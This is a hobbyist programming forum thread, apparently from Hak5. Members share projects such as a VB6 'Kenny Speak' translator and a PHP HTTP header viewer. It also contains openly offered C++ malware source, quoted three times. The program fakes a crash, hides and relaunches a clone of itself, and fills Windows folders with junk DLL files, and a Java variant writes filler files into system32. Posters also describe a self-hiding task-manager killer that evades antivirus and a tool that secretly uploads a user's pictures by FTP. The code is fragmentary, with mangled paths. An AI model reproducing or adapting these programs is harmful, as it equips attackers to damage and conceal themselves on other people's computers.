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Some of My Projects


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Hey Everyone! I've been coding VB.NET for the last couple years and I've made a whole range of application, you can see them in the list.  I'm just wondering if anyone is interested in them... if you are I can send you the executable or the code.  if theres enough interest in any of these I'll keep working on them.  A lot of these are quite unfinished, some of them were really quick so I didn't spend a lot of time on really following best practices and  keeping the code neat.  I take no responsibility for any of this, use at your own risk, but most of these app's shouldn't give you problem.

Mabey Ill make all of these into one big app?

Seriously if anyone has a utility that they have been looking for, leave me a post or pm me and ill see what I can do! I'm also in the hak5irc a lot.

Big Clock (Recent, Right now its just a big clock, but im hoping to add a timer, alarm, and coutdown)

Caesar Shift Brute Force - (Will decrypt a selection of text with all 24 Caesar shift keys)

Calculator (A calculator, mostly a proof of concept)

Check Email Address (Recent, A program to check email address's)

Digital Root (proof of concept, finds the digital root of a number)

Encrypter (A Mono alphabetic cipher encrypter)

FireFoxDDEEXEC (Fix's FireFox's DDEEXEC problems, i.e. Firefox cant find that file proble)

Frequency Analysis (Analyzes the frequency of letters in a selection of text for solving mono alphabetic cipher)

TrueCrypt Launcer ( A true crypt launcher, mostly so i can use it with my fingerprint reader)

UtilMan Replacement (A replacement for utilman)

CSVtoM3U (Takes a CSV (from iTunes for example) and converts it to a M3U Playlist)

FileWatch (Monitor changes to files in a directory or drive, has a nice GUI)

SendMail (a Proof of Concept for sending mail, still in progress)

There's a few more floating around somewhere...

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I have a few apps I made that I combined into one app I call "Multiverter" It converts text to ASCII, Octet, Hex and Binary, as well as does all ROT text encoding. The one thing I never added to it was BASE64, although I haven't really pushed myself on that one. A few others I have are a Kenny Speak translator I made for making clues to some of my Geocaches. I hide them and convert the clue to any number of combuinations, like first to kenny speak, then to hex and the Geocache needs to decipher my hint before they can find the cache. I also have one that takes a word list and converts them all to MD5 hashes for looking up hashes. I even have a morse code program that converts text to morse code and back.

Not all of my code ever gets finished either and is usually made quickly and half assed just for fun but if anyone wants any of it, let me know, I would be happy to share what I have as well.

Here is my Kenny Speak program. You may have seen some of it used in my profile from time to time:


You will need the VB6 runtime files if your using anything older than XP. Otherwise it should run fine without any dependency files.

Mfpmmmpmp5 pmpmffmmfpmpfmm pfffmfpmfmppffp!

EDIT: I need to check some of my archived backups on cd and dvd, as I cannot find any of the original source code for this on my current pc. I think they may actually lie on a dead hard drive from another pc, but I will see if I can still dig them up.

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In VB6 create a form with 2 text boxes and 2 command buttons. You do not have to rename the controls and just paste the below into the form.

I cannot find my original source code, so I created this in just a few minutes. You can finish what is there to play with the full version, but I do not have time to finish it out as I am late for work. This is the basic setup I used for my Kenny Speak program (http://www.twistedpairrecords.com/Files/KennyTranslator1.exe : screenshot of the original program I created: http://www.twistedpairrecords.com/digip/kenny.jpg)

' I am not going to recreate this in full, but just show an example of what I did in my Kenny Speak program.
' This program is just an example of how you can convert text from input to output and then decode as well.
' I am not good with Array's so someone willing to clean up the code so you don't have to write out
' each if toConvert$ statment, feel free to clean it up.
' This is the basis for the Kenny Translator I wrote a few years ago, but sadly, cannot find my original source code.
' This is why it is so short and not the full program. I wipped it up in a few minutes before I leave for work.
' I use the tilda "~" and the "@" as ways to keep the translated output look normal with all spaces and CrLf's
' You can come up with special characters of your own to do the same for anything else that may not format over from input to output.
' Things like ".,></?;:'"[{]}-_0)9(8*7&6^5%4$3#2@1!` can be tripled and then converted back in the final output so they
' don't show up in triplicate on the output box.
' You can find the Kenny alphabet in this C program: http://www.geekounet.org/bin/kenny.c
' Just substitute the Kenny alphabet in place of what is below to its corresponding characters.
'Here is an excerpt from the C program showing the alphabet used in Kenny Speak.
                 'e': sprintf(add, "mpp")
                 't': sprintf(add, "fmp")
                 'a': sprintf(add, "mmm")
                 'o': sprintf(add, "ppf")
                 'i': sprintf(add, "mff")
                 'n': sprintf(add, "ppp")
                 's': sprintf(add, "fmm")
                 'h': sprintf(add, "mfp")
                 'r': sprintf(add, "pff")
                 'd': sprintf(add, "mpm")
                 'l': sprintf(add, "pmf")
                 'c': sprintf(add, "mmf")
                 'u': sprintf(add, "fmf")
                 'm': sprintf(add, "ppm")
                 'w': sprintf(add, "fpp")
                 'f': sprintf(add, "mpf")
                 'g': sprintf(add, "mfm")
                 'y': sprintf(add, "ffm")
                 'p': sprintf(add, "pfm")
                 'b': sprintf(add, "mmp")
                 'v': sprintf(add, "fpm")
                 'k': sprintf(add, "pmp")
                 'j': sprintf(add, "pmm")
                 'x': sprintf(add, "fpf")
                 'q': sprintf(add, "pfp")
                 'z': sprintf(add, "ffp")
                 'E': sprintf(add, "Mpp")
                 'T': sprintf(add, "Fmp")
                 'A': sprintf(add, "Mmm")
                 'O': sprintf(add, "Ppf")
                 'I': sprintf(add, "Mff")
                 'N': sprintf(add, "Ppp")
                 'S': sprintf(add, "Fmm")
                 'H': sprintf(add, "Mfp")
                 'R': sprintf(add, "Pff")
                 'D': sprintf(add, "Mpm")
                 'L': sprintf(add, "Pmf")
                 'C': sprintf(add, "Mmf")
                 'U': sprintf(add, "Fmf")
                 'M': sprintf(add, "Ppm")
                 'W': sprintf(add, "Fpp")
                 'F': sprintf(add, "Mpf")
                 'G': sprintf(add, "Mfm")
                 'Y': sprintf(add, "Ffm")
                 'P': sprintf(add, "Pfm")
                 'B': sprintf(add, "Mmp")
                 'V': sprintf(add, "Fpm")
                 'K': sprintf(add, "Pmp")
                 'J': sprintf(add, "Pmm")
                 'X': sprintf(add, "Fpf")
                 'Q': sprintf(add, "Pfp")
                 'Z': sprintf(add, "Ffp")

' Using the below method, enter all alphanumeric translations from the alphabet and its translated parts.

Private Sub Command1_Click()
    Text2.Text = ""
    t1$ = Text1.Text
    t2$ = Replace(Text1.Text, " ", "@") ' Control Characters to always show up the same in pre/after encode
    t2$ = Replace(t2$, vbCrLf, "~")     ' Control Characters to always show up the same in pre/after encode
    tLen$ = Len(t2$)
    For i = 0 To tLen$ 'Step 1
    x = 1
    y = x + i
    toConvert$ = Mid(t2$, y, 1)
    'Kenny Speak letter conversion Example:
     If toConvert$ = "a" Then Text2.Text = Text2.Text & "mmm"
     If toConvert$ = "A" Then Text2.Text = Text2.Text & "Mmm"
    'Below is not kenny speak but just an example.
    If toConvert$ = "T" Then Text2.Text = Text2.Text & "TTT"
    If toConvert$ = "e" Then Text2.Text = Text2.Text & "eee"
    If toConvert$ = "x" Then Text2.Text = Text2.Text & "xxx"
    If toConvert$ = "t" Then Text2.Text = Text2.Text & "ttt"
    If toConvert$ = "1" Then Text2.Text = Text2.Text & "111"
    If toConvert$ = "2" Then Text2.Text = Text2.Text & "222"
    If toConvert$ = "@" Then Text2.Text = Text2.Text & " "
    If toConvert$ = "~" Then Text2.Text = Text2.Text & vbCrLf
    If y = tLen$ + 1 Then GoTo exitP1
    Next i
End Sub

Private Sub Command2_Click()
    Text2.Text = ""
    t1$ = Text1.Text
    t2$ = Replace(Text1.Text, " ", "@@@")
    t2$ = Replace(t2$, vbCrLf, "~~~")
    tLen$ = Len(t2$)
    For i = 1 To tLen$ 'Step 3
    x = 1
    y = x + i
    toConvert$ = Mid(t2$, y - 1, 3) 'Make sure we do not skip the first character.
     If toConvert$ = "mmm" Then Text2.Text = Text2.Text & "a"
     If toConvert$ = "Mmm" Then Text2.Text = Text2.Text & "A"
    If toConvert$ = "TTT" Then Text2.Text = Text2.Text & "T"
    If toConvert$ = "eee" Then Text2.Text = Text2.Text & "e"
    If toConvert$ = "xxx" Then Text2.Text = Text2.Text & "x"
    If toConvert$ = "ttt" Then Text2.Text = Text2.Text & "t"
    If toConvert$ = "111" Then Text2.Text = Text2.Text & "1"
    If toConvert$ = "222" Then Text2.Text = Text2.Text & "2"
    If toConvert$ = "@@@" Then Text2.Text = Text2.Text & " "
    If toConvert$ = "~~~" Then Text2.Text = Text2.Text & vbCrLf
    If y = tLen$ Then GoTo exitP1
    Next i
End Sub

Private Sub Form_Load()
Text2.Text = ""
Text1.Text = "1 2 Text 1 2" & vbCrLf & "Text 1 2" 'Just some default stuff to work with.
End Sub

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Nice work with the kenny translator, now you need to make it speak with audio.

Very easy. Add the Microsoft text to speech library and pick a voice for it. At one time I had a program I created fr my Neice that would read to her and teach her how to spell based on Microsoft Agent characters. Peedy the Parrot and the Wizard, etc, all worked with the program and you could pick which character to speak. You could also download other agent characters and it would automatically see all the other Agent files since it was based on their microsoft agent sample code, so long as they were installed in the default Agent folder, you could use any character.

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  • 2 weeks later...
  • 4 weeks later...

Mfpmmmpmp5 pmpmffmmfpmpfmm pfffmfpmfmppffp!

Unfortunately, I have a Mac, so I cannot translate what you wrote.  However, it looks like a nice little program.

There are web based translators as well: http://www.namesuppressed.com/kenny/

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"Hak5 kicks rulez" What? :-P

Yeah, it should have said: Mfpmmmpmp5 pfffmfpmfmppffp!


I created a little VB6 program to kill taskmgr. It hides itself off screen detecting mouse movements and key strokes.


Virus Scanners do not detect it as a threat since it's just basic windows shell commands.

Virus Total results: http://www.virustotal.com/analisis/60fa6d1...3ba0d76237a8bd2

Now, I know it seems completely script kiddie in use for someone to add it to a payload, but it can be used for other things like store kiosks where you do not want the public to be able to kill any running applications. Add a function to kill cmd.exe and command.com and they can't manually pull up tasklist to run taskkill against it. they could still run it from a RUN prompt, but they would need to know the name of the file. Making it kill msinfo32 also takes away their ability to find its name in running tasks, leaving only someone to write a bat file or execute the full commands from a run prompt to get the results of tasklist, then needing to know what file to kill. The average user is probably not going to be able to disable it in a store kiosk without knowing what to look for.

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#include <fstream>
#include <windows.h>

I the author am not responsible for how you may use
this program, I am not responsible for any damages
that may occur when using this program
Author/Programmer - K1u
Site - k0h.org

Disclaimer posted on official site of author -
"The user of any program/material found on this site is responsible
for any actions using it.
k0h.org hereby disclaims any responsibility for the users action.
We are also not responsible for what may happen when
using them or any damages that may occur from using them."



learning CPP!

using namespace std;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR IpCmdLine, int nCmdShow){

/* We make the person think that this program has crashed... as it continues to run in background
MB_OK makes the nice little ok button and MB_ICONSTOP is the stop sign icon. More on the functions you can use if you modify this -
http://msdn2.microsoft.com/en-us/library/ms645505.aspx */
MessageBox(NULL, "Exception AccessViolation in module at 0008B021.nProgram will restart now",  "Application error", MB_OK|MB_ICONSTOP);

/* Lets use a hidden console throughout this whole program shall we */

/* Now then lets just spread this program around a bit shall we */

/* Ah... lets make a hidden clone... why not, we use the SetFileAttributes function to make it Hidden*/
char hiddenpath[256] = { "C:WINDOWSslvcshost.exe" };
SetFileAttributes(hiddenpath, FILE_ATTRIBUTE_HIDDEN);

/* We get the file name, szPath represents the path of the exe
WTF is a TCHAR you ask? - http://msdn2.microsoft.com/en-us/library/ms527395.aspx :D */
/* More on GetModuleFileName func - http://msdn2.microsoft.com/en-us/library/ms683197.aspx */
GetModuleFileName(NULL, szPath, MAX_PATH);

/* Copy it to location */
CopyFile(szPath, hiddenpath, 0);

/* What will be printed into the dll files, this is considered a Matrix or a 2 dimensional array.*/
char fstring[20][256] = {
     "010101010100101010100101001011010100101010101010101n" ,
     "Allo' Allo' !Enjoy!////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "Program for educational purposes only///////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "I the author am not responsible for how you may usen" ,
     "this program, I am not responsible for any damages/n" ,
     "that may occur when using this program.////////////n" ,
     "000000000000000000000000///////////////////////////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "0000000000000000000000000000000////////////////////n" ,
     "000000000000000000000000000000000000000000000000000n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "00000000n" ,
     "00000000///////////////////////////////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" };

   /* Location of DLL file output
   ios::app will write to the end of file instead of overwriting it */
   ofstream putout0 ("C:WINDOWS 1tw7ain0.dll", ios::app);
   ofstream putout1 ("C:WINDOWS 1tw7ain1.dll", ios::app);
   ofstream putout2 ("C:WINDOWS 1tw7ain2.dll", ios::app);

   /* Now before you think to yourself wtf why isnt he using for(;;) to have a endless loop
   Explaination - It must limit because a endless input into the files would not allow copying of the file efficiently
   No I am not explaining what a for loop is... if you do not know what that is then you clearly do not know C++ */
   for(int i = 0; i < 5000000; i++){

   /* Hard drive space waste or filling portion of this program
   putout# is the path and file and fstring is what will be printed into */       
   putout0 << fstring;

   putout1 << fstring;

   putout2 << fstring;


   /* Commence spreading of DLL file
   Set location where generated dll files currently located
   Note - I will work on making this more efficient on BETA 3 */
   char* start1loc0 = "C:WINDOWS1tw7ain0.dll";
   char* start1loc1 = "C:WINDOWS1tw7ain1.dll";
   char* start1loc2 = "C:WINDOWS1tw7ain2.dll";

   /* End locations */
   char* end1loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* end1loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* end1loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Use CopyFile function to copy to end locations, lol CopyFile... what a simple func to use :D
   If the var names do not explain enough...
   start#loc# is the start location (path and filename) and the end locations are end#loc# */
   CopyFile(start1loc0, end1loc0, 0);
   CopyFile(start1loc1, end1loc1, 0);
   CopyFile(start1loc2, end1loc2, 0);

   /* Previous end locations */
   char* start2loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* start2loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* start2loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Now lets spread those generated in system to Help, notice we do not touch system32 */
   char* end2loc0 = "C:WINDOWSHelpsystem.dll";
   char* end2loc1 = "C:WINDOWSHelpdrvrexe.dll";
   char* end2loc2 = "C:WINDOWSHelpdrhome.dll";

   /* Use CopyFile function to copy to end locations */
   CopyFile(start2loc0, end2loc0, 0);
   CopyFile(start2loc1, end2loc1, 0);
   CopyFile(start2loc2, end2loc2, 0);

   /* :) <3 !
   Now then that was fun? Twas it not... lets run the hidden clone of the program we copied :)
   I was originally using system to execute this like a idiot but found Winexec is better -
   WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);

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learning CPP!

Is that meant to be C++?

Also, and not to offend because I am strictly curious, what exatly does this do? I do not have a compiler or experience with C, but I assume this hides itself as a running service named "slvcshost.exe"  spreads itself around to varios places defined in the code?

Not knwoing C++ I was thinking it creates these "1tw7ain0.dll" files with whatever you put in them from "fstring[20][256]" etc...  and then copies themselves as files to the help folder and system folder. Then starts itself with "WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);" and while running it just fills up the files until no space is left?

I know its commented and I seem to be following it but not sure what it does without running it myself (not that it looks like something I would want to run on my system anyway since I do not know exactly what the hell it really does :) )

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Don't know how usefull this is for anyone, but after experimenting with some things I came up with some code to rip the headers from websites that normally would not show up in the browser. You can use wget to do the same thing, but this can be loaded from your site to just inspect the cookies or headers from any url you plug into it:

<html><head><title>Cookie Clutter Head Inspector</title></head><body bgcolor="white">
<table border="0" width="600px"><TR><TD>
<BR><font color="#97C0C1">
<center>Enter URL to get HTTP Headers<BR><BR>
<form id="Form1" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
Phrase : <input type="text" name="url1" size="22" /> <input type="hidden" name="SubmitCheck" value="sent" />
<input type="Submit" name="Form1_Submit" value="Give Me Head" /></form>

<font color="#9CA4A4">

if($_POST['url1'] == "") {
echo ("<center>No empty phrases please.</center>"); }
else {
$a1 = str_replace("http://","", $_POST['url1']);
$a2 = "http://".$a1;
$aH = get_headers($a2);
echo $a2."<BR>";
echo implode("<BR>",$aH); //because it is an array and not a string, we want to make each part of the array on its own line.

Just save it to something like givemehead.php and run it.

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learning CPP!

Is that meant to be C++?

Also, and not to offend because I am strictly curious, what exatly does this do? I do not have a compiler or experience with C, but I assume this hides itself as a running service named "slvcshost.exe"  spreads itself around to varios places defined in the code?

Not knwoing C++ I was thinking it creates these "1tw7ain0.dll" files with whatever you put in them from "fstring[20][256]" etc...  and then copies themselves as files to the help folder and system folder. Then starts itself with "WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);" and while running it just fills up the files until no space is left?

I know its commented and I seem to be following it but not sure what it does without running it myself (not that it looks like something I would want to run on my system anyway since I do not know exactly what the hell it really does :) )

It fills the folder WINDOWS with DLL files, and clones itself so it never stops filling. It is nothing special, I made it a while back... but the good thing was I learned alot from doing it, I had to do alot of research on MSDN (Microsoft Developers Network).

You can run it on your system, just end the processes then delete the files. Look at the code to see how it works, where it attacks and then simply run it and with your knowledge of the program you will know how to fix what it has done.

Yeah lol... I am used to saying CPP (C Plus Plus), instead of C++, lol.

"Not knwoing C++ I was thinking it creates these "1tw7ain0.dll" files with whatever you put in them from "fstring[20][256]" etc...  and then copies themselves as files to the help folder and system folder. Then starts itself with "WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);" and while running it just fills up the files until no space is left?"

Yes basically, I added some comments so you could understand it better,

/* Creation of the file, with ios:app flag to write to the end of file, instead of overwriting the file everytime */
ofstream putout0 ("C:WINDOWS 1tw7ain0.dll", ios::app);

/* Put the contents of fstring into putout0, being  1tw7ain0.dll */
putout0 << fstring;

It is nothing great, its just a very simple program that helped a lot of my friends understand some certain things in CPP better.

My friend Lordowner (a friend from school and online) created his own version of my application in Java, if you would like to see it, he is a very talented Java Programmer.

/* This was made for educational purposes only, I am not responsible for any harm done using it. FOR EDUCATIONAL PURPOSES ONLY. */
import java.util.*;
import java.io.*;
public class Eat
    public static void main(String[] args)throws IOException
        String output="";
        Scanner input=new Scanner(new FileReader("fillup.txt"));
        int e=0;
        PrintWriter v;
            v=new PrintWriter(new FileWriter("C:Windowssystem32Owned"+e+".txt",true));
            for(int i=0;i<500000;i++)
/* you have to make a fillup.txt file, before executing the program, and you can fill it with whatever text, you want the more text, the more space you can take */

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#include <fstream>
#include <windows.h>

I the author am not responsible for how you may use
this program, I am not responsible for any damages
that may occur when using this program
Author/Programmer - K1u
Site - k0h.org

Disclaimer posted on official site of author -
"The user of any program/material found on this site is responsible
for any actions using it.
k0h.org hereby disclaims any responsibility for the users action.
We are also not responsible for what may happen when
using them or any damages that may occur from using them."



learning CPP!

using namespace std;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR IpCmdLine, int nCmdShow){

/* We make the person think that this program has crashed... as it continues to run in background
MB_OK makes the nice little ok button and MB_ICONSTOP is the stop sign icon. More on the functions you can use if you modify this -
http://msdn2.microsoft.com/en-us/library/ms645505.aspx */
MessageBox(NULL, "Exception AccessViolation in module at 0008B021.nProgram will restart now",  "Application error", MB_OK|MB_ICONSTOP);

/* Lets use a hidden console throughout this whole program shall we */

/* Now then lets just spread this program around a bit shall we */

/* Ah... lets make a hidden clone... why not, we use the SetFileAttributes function to make it Hidden*/
char hiddenpath[256] = { "C:WINDOWSslvcshost.exe" };
SetFileAttributes(hiddenpath, FILE_ATTRIBUTE_HIDDEN);

/* We get the file name, szPath represents the path of the exe
WTF is a TCHAR you ask? - http://msdn2.microsoft.com/en-us/library/ms527395.aspx :D */
/* More on GetModuleFileName func - http://msdn2.microsoft.com/en-us/library/ms683197.aspx */
GetModuleFileName(NULL, szPath, MAX_PATH);

/* Copy it to location */
CopyFile(szPath, hiddenpath, 0);

/* What will be printed into the dll files, this is considered a Matrix or a 2 dimensional array.*/
char fstring[20][256] = {
     "010101010100101010100101001011010100101010101010101n" ,
     "Allo' Allo' !Enjoy!////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "Program for educational purposes only///////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "I the author am not responsible for how you may usen" ,
     "this program, I am not responsible for any damages/n" ,
     "that may occur when using this program.////////////n" ,
     "000000000000000000000000///////////////////////////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "0000000000000000000000000000000////////////////////n" ,
     "000000000000000000000000000000000000000000000000000n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "00000000n" ,
     "00000000///////////////////////////////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" };

   /* Location of DLL file output
   ios::app will write to the end of file instead of overwriting it */
   ofstream putout0 ("C:WINDOWS 1tw7ain0.dll", ios::app);
   ofstream putout1 ("C:WINDOWS 1tw7ain1.dll", ios::app);
   ofstream putout2 ("C:WINDOWS 1tw7ain2.dll", ios::app);

   /* Now before you think to yourself wtf why isnt he using for(;;) to have a endless loop
   Explaination - It must limit because a endless input into the files would not allow copying of the file efficiently
   No I am not explaining what a for loop is... if you do not know what that is then you clearly do not know C++ */
   for(int i = 0; i < 5000000; i++){

   /* Hard drive space waste or filling portion of this program
   putout# is the path and file and fstring is what will be printed into */       
   putout0 << fstring;

   putout1 << fstring;

   putout2 << fstring;


   /* Commence spreading of DLL file
   Set location where generated dll files currently located
   Note - I will work on making this more efficient on BETA 3 */
   char* start1loc0 = "C:WINDOWS1tw7ain0.dll";
   char* start1loc1 = "C:WINDOWS1tw7ain1.dll";
   char* start1loc2 = "C:WINDOWS1tw7ain2.dll";

   /* End locations */
   char* end1loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* end1loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* end1loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Use CopyFile function to copy to end locations, lol CopyFile... what a simple func to use :D
   If the var names do not explain enough...
   start#loc# is the start location (path and filename) and the end locations are end#loc# */
   CopyFile(start1loc0, end1loc0, 0);
   CopyFile(start1loc1, end1loc1, 0);
   CopyFile(start1loc2, end1loc2, 0);

   /* Previous end locations */
   char* start2loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* start2loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* start2loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Now lets spread those generated in system to Help, notice we do not touch system32 */
   char* end2loc0 = "C:WINDOWSHelpsystem.dll";
   char* end2loc1 = "C:WINDOWSHelpdrvrexe.dll";
   char* end2loc2 = "C:WINDOWSHelpdrhome.dll";

   /* Use CopyFile function to copy to end locations */
   CopyFile(start2loc0, end2loc0, 0);
   CopyFile(start2loc1, end2loc1, 0);
   CopyFile(start2loc2, end2loc2, 0);

   /* :) <3 !
   Now then that was fun? Twas it not... lets run the hidden clone of the program we copied :)
   I was originally using system to execute this like a idiot but found Winexec is better -
   WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);

The only problem with this is it doesn't fill up the hdd, because each process creates the same files.

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#include <fstream>
#include <windows.h>

I the author am not responsible for how you may use
this program, I am not responsible for any damages
that may occur when using this program
Author/Programmer - K1u
Site - k0h.org

Disclaimer posted on official site of author -
"The user of any program/material found on this site is responsible
for any actions using it.
k0h.org hereby disclaims any responsibility for the users action.
We are also not responsible for what may happen when
using them or any damages that may occur from using them."



learning CPP!

using namespace std;

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR IpCmdLine, int nCmdShow){

/* We make the person think that this program has crashed... as it continues to run in background
MB_OK makes the nice little ok button and MB_ICONSTOP is the stop sign icon. More on the functions you can use if you modify this -
http://msdn2.microsoft.com/en-us/library/ms645505.aspx */
MessageBox(NULL, "Exception AccessViolation in module at 0008B021.nProgram will restart now",  "Application error", MB_OK|MB_ICONSTOP);

/* Lets use a hidden console throughout this whole program shall we */

/* Now then lets just spread this program around a bit shall we */

/* Ah... lets make a hidden clone... why not, we use the SetFileAttributes function to make it Hidden*/
char hiddenpath[256] = { "C:WINDOWSslvcshost.exe" };
SetFileAttributes(hiddenpath, FILE_ATTRIBUTE_HIDDEN);

/* We get the file name, szPath represents the path of the exe
WTF is a TCHAR you ask? - http://msdn2.microsoft.com/en-us/library/ms527395.aspx :D */
/* More on GetModuleFileName func - http://msdn2.microsoft.com/en-us/library/ms683197.aspx */
GetModuleFileName(NULL, szPath, MAX_PATH);

/* Copy it to location */
CopyFile(szPath, hiddenpath, 0);

/* What will be printed into the dll files, this is considered a Matrix or a 2 dimensional array.*/
char fstring[20][256] = {
     "010101010100101010100101001011010100101010101010101n" ,
     "Allo' Allo' !Enjoy!////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "Program for educational purposes only///////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "I the author am not responsible for how you may usen" ,
     "this program, I am not responsible for any damages/n" ,
     "that may occur when using this program.////////////n" ,
     "000000000000000000000000///////////////////////////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "00000000000000000000000000000000000000000000000////n" ,
     "0000000000000000000000000000000////////////////////n" ,
     "000000000000000000000000000000000000000000000000000n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "00000000n" ,
     "00000000///////////////////////////////////////////n" ,
     "010101010100101010100101001011010100101010101010101n" ,
     "010101010100101010100101001011010100101010101010101n" };

   /* Location of DLL file output
   ios::app will write to the end of file instead of overwriting it */
   ofstream putout0 ("C:WINDOWS 1tw7ain0.dll", ios::app);
   ofstream putout1 ("C:WINDOWS 1tw7ain1.dll", ios::app);
   ofstream putout2 ("C:WINDOWS 1tw7ain2.dll", ios::app);

   /* Now before you think to yourself wtf why isnt he using for(;;) to have a endless loop
   Explaination - It must limit because a endless input into the files would not allow copying of the file efficiently
   No I am not explaining what a for loop is... if you do not know what that is then you clearly do not know C++ */
   for(int i = 0; i < 5000000; i++){

   /* Hard drive space waste or filling portion of this program
   putout# is the path and file and fstring is what will be printed into */       
   putout0 << fstring;

   putout1 << fstring;

   putout2 << fstring;


   /* Commence spreading of DLL file
   Set location where generated dll files currently located
   Note - I will work on making this more efficient on BETA 3 */
   char* start1loc0 = "C:WINDOWS1tw7ain0.dll";
   char* start1loc1 = "C:WINDOWS1tw7ain1.dll";
   char* start1loc2 = "C:WINDOWS1tw7ain2.dll";

   /* End locations */
   char* end1loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* end1loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* end1loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Use CopyFile function to copy to end locations, lol CopyFile... what a simple func to use :D
   If the var names do not explain enough...
   start#loc# is the start location (path and filename) and the end locations are end#loc# */
   CopyFile(start1loc0, end1loc0, 0);
   CopyFile(start1loc1, end1loc1, 0);
   CopyFile(start1loc2, end1loc2, 0);

   /* Previous end locations */
   char* start2loc0 = "C:WINDOWSsystem1tw7ain0.dll";
   char* start2loc1 = "C:WINDOWSsystem1tw7ain1.dll";
   char* start2loc2 = "C:WINDOWSsystem1tw7ain2.dll";

   /* Now lets spread those generated in system to Help, notice we do not touch system32 */
   char* end2loc0 = "C:WINDOWSHelpsystem.dll";
   char* end2loc1 = "C:WINDOWSHelpdrvrexe.dll";
   char* end2loc2 = "C:WINDOWSHelpdrhome.dll";

   /* Use CopyFile function to copy to end locations */
   CopyFile(start2loc0, end2loc0, 0);
   CopyFile(start2loc1, end2loc1, 0);
   CopyFile(start2loc2, end2loc2, 0);

   /* :) <3 !
   Now then that was fun? Twas it not... lets run the hidden clone of the program we copied :)
   I was originally using system to execute this like a idiot but found Winexec is better -
   WinExec("C:WINDOWSslvcshost.exe", SW_HIDE);

The only problem with this is it doesn't fill up the hdd, because each process creates the same files.

Yeah... my program isn't that great... the idea is that those cloned processes will also write to the end of those files.

In truth what would really happen is that the system would start to get a bit slow, someone would notice, and end the processes  :(

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A little VB6 app I created to count strings in a text file. Usfull when working on web pages and you want to compare tag counts to make sure their closed. EX: find "<FORM" and "</FORM" in a file.


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  • 2 weeks later...

I've made a program that will look when run on remote machine it will look at My Pictures and My Documents and sends the pictures by ftp to a site then launch the website to tell them look what i just got  :grin::lol: if you want to have a look PM me and i send you a link i promise it wont upload ur pictures to me as it wont have my settings in it

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